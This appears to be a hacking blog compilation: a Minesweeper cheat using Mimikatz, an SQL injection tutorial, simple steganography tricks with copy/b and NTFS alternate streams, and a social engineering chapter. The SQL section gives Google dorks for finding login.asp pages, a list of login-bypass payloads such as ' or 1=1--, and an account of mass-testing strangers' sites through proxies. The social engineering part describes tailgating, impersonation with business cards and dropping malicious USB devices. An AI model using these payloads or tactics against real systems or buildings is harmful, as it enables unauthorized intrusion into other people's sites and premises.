Uncovering Mines @ Minesweeper (in Xp & W7) 

Is hacking Just not only cracking a website,Breaking a software or protecting your Data from crackers !

Here we will use a sophisticated tool to Detect Mine in the Minesweeper using a Tool called Mimikatz by Benjamin which do wonders, But i will just use a single 

functions on minesweeper and others are you to Explore...

Very Simple Code with too much Fun !! 

Step 1 : Download Mimikatz from the below link

Step 2 : Run the minikatz

Step 3 : Open Minesweeper Game 

(if you dono to Open, Please Shut your computer and Sleep)

Step 4 : Type this line winmine::infos for windows XP

  minesweeper::infos for windows7 and 8

Step 5 : Ho ya you understood, The astrix are the mines - Skip It & Win It (HACKING Is also FUN)

Please i have not mentioned much about this purposely, If your interested contact me @ Vaijayanthmk@gmail.com  

Advanced SQL Injections

One of the major problems with SQL is its poor security issues surrounding is the login and url strings.
this tutorial is not going to go into detail on why these string work as am not a coder i just know what i know and it works

If you are interested in this topic we have many articles related to SQL Injection also if you would like help with the topic
you can ask in our information security forum where thousands of members can help you.

SEARCH:

admin\login.asp
login.asp

with these two search string you will have plenty of targets to chose from...finding one thats vulnerable is another question

WHAT I DO : first let me go into details on how i go about my research
i have gathered plenty of injection strings for quite some time like these below and have just been granted access to a test machine and will be testing for many variations and new inputs...legally cool...provided bymy good friend Gsecur aka ICE..also an Astal member.. http://governmentsecurity.org "thanks mate" .. gives me a chance to concentrate on what am doing and not be looking over my shoulder

INJECTION STRINGS:HOW ? 
this is the easiest part...very simple

on the login page just enter something like

user:admin (you dont even have to put this.)
pass:' or 1=1--

or

user:' or 1=1--
admin:' or 1=1--

some sites will have just a password so

password:' or 1=1--

infact i have compiled a combo list with strings like this to use on my chosen targets ....there are plenty of strings about , the list below is a sample of the most common used

there are many other strings involving for instance UNION table access via reading the error pages table structure
thus an attack with this method will reveal eventually admin U\P paths...but thats another paper

the one am interested in are quick access to targets

PROGRAM 
i tried several programs to use with these search strings and upto now only Ares has peformed well with quite a bit
of success with a combo list formatted this way,yesteday i loaded 40 eastern targets with 18 positive hits in a few minutes
how long would it take to go thought 40 sites cutting and pasting each string ?? 

combo example:

admin:' or a=a--
admin:' or 1=1--

and so on...it dont have to be admin can be anything you want... the most important part is example:' or 1=1-- this is our injection
string

now the only trudge part is finding targets to exploit...so i tend to search say google for login.asp or whatever

inurl:login.asp
index of:/admin/login.asp

like this: index of login.asp

result:

http://www3.google.com/search?hl=en&ie=ISO...G=Google+Search 

17,000 possible targets trying various searches spews out plent more


now using proxys set in my browser i then click through interesting targets...seeing whats what on the site pages if interesting
i then cut and paste url as a possible target...after an hour or so you have a list of sites of potential targets like so

http://www.somesite.com/login.asp 
http://www.another.com/admin/login.asp 

and so on...in a couple of hours you can build up quite a list...reason i dont sellect all results or spider for login pages is
i want to keep the noise level low...my ISP.. well enough said...plus atm am on dial-up so to slow for me

i then save the list fire up Ares and enter (1) a proxy list (2)my target IP list (3)my combo list...start..now i dont want to go into
problems with users using Ares..thing is i know it works for me...

sit back and wait...any target vulnerable with show up in the hits box...now when it finds a target it will spew all the strings on that site as vulnerable...you have to go through each one on the site by cutting and pasting the string till you find the right one..but the thing is you know you CAN access the site ...really i need a program that will return the hit with a click on url and ignore false outputs 

am still looking....thing is it saves quite a bit of time going to each site and each string to find its not exploitable.

there you go you should have access to your vulnerable target by now

another thing you can use the strings in the urls were user=? edit the url to the = part and paste ' or 1=1-- so it becomes

user=' or 1=1-- just as quick as login process


(Variations)

admin'--

' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or 'x'='x

" or "x"="x

') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1--

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --

hi' or 'a'='a

hi') or ('a'='a

hi") or ("a"="a

happy hunting

Stenography

Every one Need to hide something.. Keep some stuffs secret.  We are just learning this for fun, No offense

Steganography is the art and science of writing hidden messages in such a way that no one, apart from the sender and intended recipient, suspects the existence of the message, a form of security through obscurity. The word steganography is of Greek origin and means "concealed writing" from the Greek words steganos(στεγανός) meaning "covered or protected", and graphei (γραφή) meaning "writing". The first recorded use of the term was in 1499 by Johannes Trithemius in his Steganographia, a treatise on cryptography and steganography disguised as a book on magic. Generally, messages will appear to be something else: images, articles, shopping lists, or some other covertext and, classically, the hidden message may be in invisible ink between the visible lines of a private letter.

The advantage of steganography over cryptography alone is that messages do not attract attention to themselves. Plainly visible encrypted messages—no matter how unbreakable—will arouse suspicion, and may in themselves be incriminating in countries where encryption is illegal.^[1] Therefore, whereas cryptography protects the contents of a message, steganography can be said to protect both messages and communicating parties.

Some Interesting Olden people followed are. 

Hidden messages within wax tablets

Hidden messages on messenger's body 

invisible ink.

We have lot of highly sophisticated softwares to Hide datas.But Will see Simple tricks to Make your Datas and Banking password Secret.

1.To Hide a Image behind the Pictures 

Download an attractive image say : PIC.jpg
Open a Text File in the name : Hide.txt

Ok Open CMD and Type the below line

copy/b PIC.jpg+Hide.txt  New.jpg

Now you get a new image New.jpg

: Just Be cool : Open The image in Text Editor you will find it in the Bottom of the File..

2. Hiding the Text Behind a Text 

This is a cool one and very use full to hide your important datas like bank passwords

1. Launch Windows command prompt from Start Menu -> Run -> Type cmd and press Enter.
2. Using DOS commands navigate to the desired folder.
3. Now type in notepad VisibleFile.txt:HiddenFile.txt and hit Enter, you can change VisibleFile.txt and HiddenFile.txt to names of your choice (notice the : between both file-names), You will be prompted to Create a New file click Yes as shown below.

4. Now enter data you want to hide, save the file and close notepad.
5. Visit the file-save location, you will see your VisibleFile.txt file (non-hidden) there, you can open the file and enter any text of your choice as any other normal text file.

6. The hidden file HiddenFile.txt will not be visible under Windows Explorer or DOS.
7. To open and read/write your hidden file, type in the command notepad VisibleFile.txt:HiddenFile.txt (change filenames with your own used during Step 3 above) at DOS command prompt and hit Enter.

Do note that if the visible file (VisibleFile.txt) is deleted your hidden file (HiddenFile.txt) will also get deleted.

How To Disable Right Click On Your Website Or Blog ?

If you own a blog or a website then you always want to prevent other malicious bloggers from copying the content from your blog. You might have written an article with great efforts and lots of research and other just copy/paste it on their blog. To prevent such users from copying content from your blog i will show you Javascript Trick to disable right click on your blog. So lets get started.

1. Got to your blogger Dashboard and then Click on Layout.

Social Engineering

Chapter 1

What is social Engineering... Off course Hackers know it.. and Crackers Master it...

According to Me first Step in Hacking is Social Engineering. Without High Tech Hardwares and Sophisticated Software we Can break through into any system steal or collect any softwares. Yup Social engineering will make tat Possible.

So what is Social Engineering.. Nothing But to get the information from the target himself in some other means.. Your entire skill comes to a spot light here.

I wanted to share some tools and tricks that I use when doing Social Engineering. The best part of Social Engineering is you can practice it anywhere just by talking to people and trying to get information from them.

Tools in my arsenal:
Mobile Phone
Lock Picks
Business cards
SET
Teensy Device
RFID Card

The first thing you need is bags of confidence as you are trying to sell yourself, this is where practicing comes into play. I gained a lot of this from working in sales and selling to customers, trying to make them part with cash and buy more stuff. The company I used to work for also showed me how to manipulate people and overcome objections.

You have to be quick witted too and think fast off your feet. Never try to sell yourself as someone who has certain skills when you don’t. You may be in a situation where you need to think fast to get out of it. For example you get stopped by a security guard. What are you gonna say to him ? Are you just going to give up? What story will be good enough so he lets you go on your way?

The first tool that you should always have is a mobile phone this is one of the best tools ever in Social Engineering. The good thing about us humans is that we are either really nice people or not confident enough to interrupt someone on the phone, as that would just be so rude. Speaking on the phone whilst walking into a building or hanging outside a RFID door on the phone waiting for a kind soul to hold the door open for us is just so easy. This pretty much works all of the time and it is really effective.

I tend to carry lock picks with me at all times but I very rarely used them, but the one time I might need them it’s better to have them than not.

A good business card will sell you like nothing else it’s easy to get cheap business cards printed these days and they are a great way to backup any story you are trying to sell. Another good tip is if you can get a business card for someone who works at the company you are doing the Social Engineering attack against you might be able to go to another location and sell yourself as being that person who works for the company.

SET Social Engineering toolkit is a great tool that works well with the teensy device. Depending on your scope you can always use this to drop USB around the company and there a good chance that someone will plug it in and run the exploit on the USB.

If you are doing a Social Engineering attack and you know they use RFID doors you can buy a RDIF card off of Ebay even though it won’t work but when people see it, you can just say your card has been playing up and you need to get it sorted. Most people will see the card and just let you in.

So got some idea.. Else You can see Sherlock Homes series by BCC. You will Became a Expert In Social Engineering . I Bet.